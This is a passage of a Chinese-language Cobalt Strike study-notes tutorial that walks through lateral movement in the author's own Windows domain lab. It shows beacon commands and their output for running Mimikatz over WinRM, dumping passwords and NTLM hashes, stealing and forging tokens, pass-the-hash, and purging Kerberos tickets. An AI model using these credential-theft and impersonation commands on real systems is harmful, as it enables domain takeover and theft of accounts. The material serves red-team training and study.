</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><p>注：如果命令运行失败，可能是 WinRM 未配置或配置有误，可在目标主机的 powershell 环境下运行 <code>winrm quickconfig</code> 命令，输入 <code>y</code> 回车即可。</p> <p>命令的运行结果也会经由 WinRM 返回并显示在命令行中，因此可以把 PowerShell 的 Invoke-Command 当作远程执行工具使用，而无需向目标系统投放其他恶意软件。</p> <p><strong>通过 WinRM 运行 Mimikatz</strong></p> <p>更进一步，甚至可以使用 PowerSploit 来通过 WinRM 运行 Mimikatz，只需要先导入 Invoke-Mimikatz.ps1 文件，再执行以下命令即可。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>powershell<span class="token operator">-</span>import <span class="token operator">/</span>path<span class="token operator">/</span>to<span class="token operator">/</span><span class="token function">Invoke-Mimikatz</span><span class="token punctuation">.</span>ps1
powershell <span class="token function">Invoke-Mimikatz</span> <span class="token operator">-</span>ComputerName TARGET
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><blockquote><p>注：之前提了很多次的 PowerView 也是 PowerSploit 项目里众多 ps1 文件之一，Mimikatz 的 ps1 文件在 PowerSploit 项目的 Exfiltration 目录下，PowerSploit 项目下载地址：<a href="https://github.com/PowerShellMafia/PowerSploit/" target="_blank" rel="noopener noreferrer">https://github.com/PowerShellMafia/PowerSploit/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></blockquote> <p>因为 beacon 的 <code>powershell-import</code> 命令限制导入的脚本大小在 1MB 以内，而 Invoke-Mimikatz.ps1 文件大小在 2 MB 多，因此直接运行 <code>powershell-import</code> 导入该文件会报错。这里可以改用 beacon 中的 upload 命令，或者在当前会话的 File Browser 图形界面中上传该文件。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>upload C:\path\<span class="token function">Invoke-Mimikatz</span><span class="token punctuation">.</span>ps1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>上传之后通过 dir 命令可以查看到文件被上传到了C盘下，之后可以运行以下命令来导入该文件。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>powershell <span class="token function">import-module</span> C:\<span class="token function">Invoke-Mimikatz</span><span class="token punctuation">.</span>ps1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>最后再运行以下命令就能通过 WinRM 执行 Mimikatz 了。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>powershell <span class="token function">Invoke-Mimikatz</span> <span class="token operator">-</span>ComputerName TARGET
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>如果提示<code>无法将“Invoke-Mimikatz”项识别为 cmdlet、函数……</code>，则可以将两条命令以分号合并在一起运行，即：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>powershell import-module C:\Invoke-Mimikatz.ps1 ; Invoke-Mimikatz -ComputerName TARGET
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell <span class="token function">import-module</span> C:\<span class="token function">Invoke-Mimikatz</span><span class="token punctuation">.</span>ps1 <span class="token punctuation">;</span> <span class="token function">Invoke-Mimikatz</span> <span class="token operator">-</span>ComputerName WinDC
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">import-module</span> C:\<span class="token function">Invoke-Mimikatz</span><span class="token punctuation">.</span>ps1 <span class="token punctuation">;</span> <span class="token function">Invoke-Mimikatz</span> <span class="token operator">-</span>ComputerName WinDC
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 287 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:

  <span class="token punctuation">.</span><span class="token comment">#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14</span>
 <span class="token punctuation">.</span><span class="token comment">## ^ ##.  &quot;A La Vie, A L'Amour&quot;</span>
 <span class="token comment">## / \ ##  /* * *</span>
 <span class="token comment">## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span>
 <span class="token string">'## v ##'</span>   http:<span class="token operator">/</span><span class="token operator">/</span>blog<span class="token punctuation">.</span>gentilkiwi<span class="token punctuation">.</span>com<span class="token operator">/</span>mimikatz             <span class="token punctuation">(</span>oe<span class="token punctuation">.</span>eo<span class="token punctuation">)</span>
  <span class="token string">'#####'</span>                                     with 20 modules <span class="token operator">*</span> <span class="token operator">*</span> <span class="token operator">*</span><span class="token operator">/</span>

mimikatz<span class="token punctuation">(</span>powershell<span class="token punctuation">)</span> <span class="token comment"># sekurlsa::logonpasswords</span>

Authentication Id : 0 <span class="token punctuation">;</span> 314628 <span class="token punctuation">(</span>00000000:0004cd04<span class="token punctuation">)</span>
Session           : Interactive <span class="token keyword">from</span> 1
User Name         : administrator
Domain            : TEAMSSIX
Logon Server      : WinDC
Logon Time        : 2020<span class="token operator">/</span>8<span class="token operator">/</span>20 23:53:08
SID               : S<span class="token operator">-</span>1<span class="token operator">-</span>5<span class="token operator">-</span>22<span class="token operator">-</span>3301978333<span class="token operator">-</span>983314215<span class="token operator">-</span>684642015<span class="token operator">-</span>500
	msv :	
	 <span class="token punctuation">[</span>00000003<span class="token punctuation">]</span> Primary
	 <span class="token operator">*</span> Username : Administrator
……内容过多，余下部分省略……
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs16-1.png" alt=""></p> <p>终于把碰到的坑都填完了，睡觉……</p> <h2 id="_4、获取信任">4、获取信任 <a href="#_4、获取信任" class="header-anchor">#</a></h2> <p>如果当前账号权限被系统认为是本地管理员权限，那么就可以执行很多管理员才能做的事，接下来就来看一下这样的一个过程是如何工作的，其中会涉及到以下要点：</p> <p>1、<code>Access Token</code> 登录令牌</p> <p>2、<code>Credentials</code> 凭证</p> <p>3、<code>Password Hashes</code> 密码哈希</p> <p>4、<code>Kerberos Tickets</code> 登录凭据</p> <h3 id="登录令牌">登录令牌 <a href="#登录令牌" class="header-anchor">#</a></h3> <ul><li>登录令牌在登录之后被创建</li> <li>与每个进程和线程相关联</li> <li>包括：
<ul><li>用户和用户组的信息</li> <li>本地计算机上的特权列表</li> <li>限制（被移除的用户和用户组权限）</li> <li>参考凭证（支持单点登录）</li></ul></li> <li>一直保存在内存中，直到系统重启</li></ul> <p><em>以下是令牌窃取的过程：</em></p> <ul><li>使用 <code>ps</code> 列出进程</li> <li>使用 <code>steal_token [pid]</code> 窃取令牌</li> <li>使用 <code>getuid</code> 查看当前身份</li> <li>使用 <code>rev2self</code> 移除令牌</li></ul> <p>接下来将对这些命令进行演示。目前有一个 SYSTEM 权限的会话，该会话在 WIN-72A8ERDSF2P 主机下，此时想查看 WIN-P2AASSD1AF1 主机下的文件（WIN-P2AASSD1AF1 主机是 TEAMSSIX 域的域控制器），那么直接运行 dir 会提示拒绝访问。原因是本地 SYSTEM 帐户在访问网络资源时使用的是本机的计算机帐户身份，而该计算机帐户在域控制器上并没有访问 C$ 共享的权限。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
拒绝访问。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>此时，先用 <code>ps</code> 查看一下当前系统进程信息。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; <span class="token function">ps</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to list processes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 12 bytes
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> <span class="token keyword">Process</span> List
 PID   PPID  Name                         Arch  Session     User
 <span class="token operator">--</span><span class="token operator">-</span>   <span class="token operator">--</span>-<span class="token operator">-</span>  <span class="token operator">--</span>-<span class="token operator">-</span>                         <span class="token operator">--</span>-<span class="token operator">-</span>  <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>     <span class="token operator">--</span>-<span class="token operator">--</span>
 0     0     <span class="token namespace">[System Process]</span>                               
 4     0     System                       x64   0           NT AUTHORITY\SYSTEM
……内容太多，此处省略……
 3720  524   taskhost<span class="token punctuation">.</span>exe                 x64   2           WIN<span class="token operator">-</span>72A8ERDSF2P\Administrator
 4092  236   dwm<span class="token punctuation">.</span>exe                      x64   3           TEAMSSIX\Administrator
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p>通过进程信息可以发现 TEAMSSIX 域下的管理员账户此时在当前 SYSTEM 会话的主机上是登录着的，使用 <code>steal_token [pid]</code> 命令窃取 TEAMSSIX\Administrator 账户的令牌</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; steal_token 4092
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to steal token <span class="token keyword">from</span> PID 4092
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 12 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> Impersonated TEAMSSIX\administrator
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>查看一下当前会话 uid</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; getuid
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to get userid
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 8 bytes
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> You are TEAMSSIX\administrator <span class="token punctuation">(</span>admin<span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>再次尝试获取域控制器主机下的文件</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
 驱动器 \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$ 中的卷没有标签。
 卷的序列号是 F269<span class="token operator">-</span>89A7
 \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$ 的目录
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:24    &lt;<span class="token function">DIR</span>&gt;          Program Files
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:52    &lt;<span class="token function">DIR</span>&gt;          Program Files <span class="token punctuation">(</span>x86<span class="token punctuation">)</span>
2020<span class="token operator">/</span>07<span class="token operator">/</span>17  23:00    &lt;<span class="token function">DIR</span>&gt;          Users
2020<span class="token operator">/</span>07<span class="token operator">/</span>26  00:55    &lt;<span class="token function">DIR</span>&gt;          Windows
               0 个文件      0 字节
               4 个目录 28<span class="token punctuation">,</span>493<span class="token punctuation">,</span>299<span class="token punctuation">,</span>712 可用字节
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs17-1.png" alt=""></p> <p>发现可以成功访问了，使用  <code>rev2self</code> 可移除当前窃取的令牌</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; rev2self
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to revert token
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 8 bytes
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>再次查看 uid 发现变成了原来的 SYSTEM 权限，此时 WIN-P2AASSD1AF1 主机上的文件也拒绝访问了。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; getuid
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to get userid
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 8 bytes
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> You are NT AUTHORITY\SYSTEM <span class="token punctuation">(</span>admin<span class="token punctuation">)</span>

beacon&gt; shell <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
拒绝访问。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><h3 id="凭证">凭证 <a href="#凭证" class="header-anchor">#</a></h3> <p>1、使用 make_token 创建一个令牌</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>make_token DOMAIN\user password
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>在运行命令之前，需要知道要获取令牌用户的密码，这里可以使用 mimikatz 进行获取，具体的方法可参考<a href="https://teamssix.com/year/200419-150600.html" target="_blank" rel="noopener noreferrer">《CS学习笔记 | 14、powerup提权的方法》<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>这一节中的介绍。</p> <p>这里还是和上文一样的环境，在一个 SYSTEM 会话下，获取 TEAMSSIX\administrator 账号令牌，使用 mimikatz 可以得知 TEAMSSIX\administrator 账号密码为 Test111!，接下来使用 <code>make_token</code> 命令。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; make_token TEAMSSIX\administrator Test111<span class="token operator">!</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to create a token <span class="token keyword">for</span> TEAMSSIX\administrator
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 53 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> Impersonated NT AUTHORITY\SYSTEM

beacon&gt; shell <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
 驱动器 \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$ 中的卷没有标签。
 卷的序列号是 F269<span class="token operator">-</span>89A7
 \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$ 的目录
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:24    &lt;<span class="token function">DIR</span>&gt;          Program Files
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:52    &lt;<span class="token function">DIR</span>&gt;          Program Files <span class="token punctuation">(</span>x86<span class="token punctuation">)</span>
2020<span class="token operator">/</span>07<span class="token operator">/</span>17  23:00    &lt;<span class="token function">DIR</span>&gt;          Users
2020<span class="token operator">/</span>07<span class="token operator">/</span>26  00:55    &lt;<span class="token function">DIR</span>&gt;          Windows
               0 个文件      0 字节
               4 个目录 28<span class="token punctuation">,</span>493<span class="token punctuation">,</span>299<span class="token punctuation">,</span>712 可用字节
               
beacon&gt; powershell <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WIN<span class="token operator">-</span>P2AASSD1AF1 <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WIN<span class="token operator">-</span>P2AASSD1AF1 <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 231 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
teamssix\administrator
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br></div></div><p>注意上面 <code>make_token</code> 执行后 beacon 仍然显示 <code>Impersonated NT AUTHORITY\SYSTEM</code>，这是因为 make_token 创建的是“仅网络”类型的登录令牌：本地身份保持不变，只有在访问远程资源时才会使用新提供的凭据，所以远程执行的 <code>whoami</code> 返回的是 teamssix\administrator。也正因为 make_token 本身不会校验密码，当密码输入错误时，只有在执行上面的两个远程命令时才会提示 <code>登录失败: 未知的用户名或错误密码。</code> 同样地，使用 <code>rev2self</code> 可除去当前令牌，恢复原来的 SYSTEM 权限。</p> <p>2、使用其他凭证派生（spawnas）一个新的 beacon</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>spawnas DOMAIN\user password
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>3、使用指定凭证与目标建立网络会话（net use）</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net use \\host\C$<span class="token operator">/</span>USER:DOMAIN\user password
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>这两种方法在之前的笔记中都或多或少地提及过，这里不再过多赘述。</p> <h3 id="密码哈希">密码哈希 <a href="#密码哈希" class="header-anchor">#</a></h3> <p>使用 mimikatz 进行哈希传递（Pass-the-Hash）</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>pth DOMAIN\user ntlmhash
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>pth 是如何工作的？</p> <p>1、mimikatz 用一个新的登录令牌启动一个进程，并把我们提供的用户名、域和 NTLM 哈希填入该登录会话的单点登录信息中</p> <p>2、Cobalt Strike 自动从该进程中窃取令牌，然后关闭该进程。与 make_token 类似，本地身份不变（因此仍显示 Impersonated NT AUTHORITY\SYSTEM），只有访问远程资源时才会以目标用户的身份进行认证</p> <p>首先使用 <code>hashdump</code> 获取用户的密码哈希值，这里的 beacon 会话为 SYSTEM 权限。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; hashdump
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to dump hashes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 82501 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received password hashes:
Administrator:500:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
Daniel:1000:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
Guest:501:aca3b435b5z404eeaad3f435b51404he:31d6cfe0d16ae931b73c59d7e0c089c0:::
TeamsSix:1002:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p>使用 <code>pth</code> 获取信任</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; pth TEAMSSIX\Administrator 12cb161bvca930994x00cbc0aczf06d1
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 23 bytes
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run mimikatz's sekurlsa::pth <span class="token operator">/</span>user:Administrator <span class="token operator">/</span>domain:TEAMSSIX <span class="token operator">/</span>ntlm:12cb161bvca930994x00cbc0aczf06d1 <span class="token operator">/</span>run:<span class="token string">&quot;%COMSPEC% /c echo ade660d8dce &gt; \\.\pipe\8d3e4c&quot;</span> command
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 750600 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 71 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> Impersonated NT AUTHORITY\SYSTEM
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
user	: Administrator
domain	: TEAMSSIX
program	: C:\Windows\system32\cmd<span class="token punctuation">.</span>exe <span class="token operator">/</span>c <span class="token function">echo</span> ade660d8dce &gt; \\<span class="token punctuation">.</span>\pipe\8d3e4c
impers<span class="token punctuation">.</span>	: no
NTLM	: 12cb161bvca930994x00cbc0aczf06d1
  <span class="token punctuation">|</span>  PID  2992
  <span class="token punctuation">|</span>  TID  5028
  <span class="token punctuation">|</span>  LSA <span class="token keyword">Process</span> is now R<span class="token operator">/</span>W
  <span class="token punctuation">|</span>  LUID 0 <span class="token punctuation">;</span> 14812112 <span class="token punctuation">(</span>00000000:00e203d0<span class="token punctuation">)</span>
  \_ msv1_0   <span class="token operator">-</span> <span class="token keyword">data</span> <span class="token function">copy</span> @ 0000000001794E80 : OK <span class="token operator">!</span>
  \_ kerberos <span class="token operator">-</span> <span class="token keyword">data</span> <span class="token function">copy</span> @ 000000000044A188
   \_ aes256_hmac       <span class="token operator">-</span>&gt; null             
   \_ aes128_hmac       <span class="token operator">-</span>&gt; null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ <span class="token operator">*</span>Password replace @ 00000000017DA1E8 <span class="token punctuation">(</span>16<span class="token punctuation">)</span> <span class="token operator">-</span>&gt; null

beacon&gt; powershell <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 231 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
teamssix\administrator
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br></div></div><h3 id="kerberos-票据">Kerberos 票据 <a href="#kerberos-票据" class="header-anchor">#</a></h3> <p>关于 Kerberos 的介绍可以查看知乎上的一篇文章，比较形象生动，文章地址： <a href="https://www.zhihu.com/question/22177404" target="_blank" rel="noopener noreferrer">https://www.zhihu.com/question/22177404<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 
62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>查看有哪些 Kerberos 票据</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell klist
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>除去 kerberos 票据</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>kerberos_ticket_purge
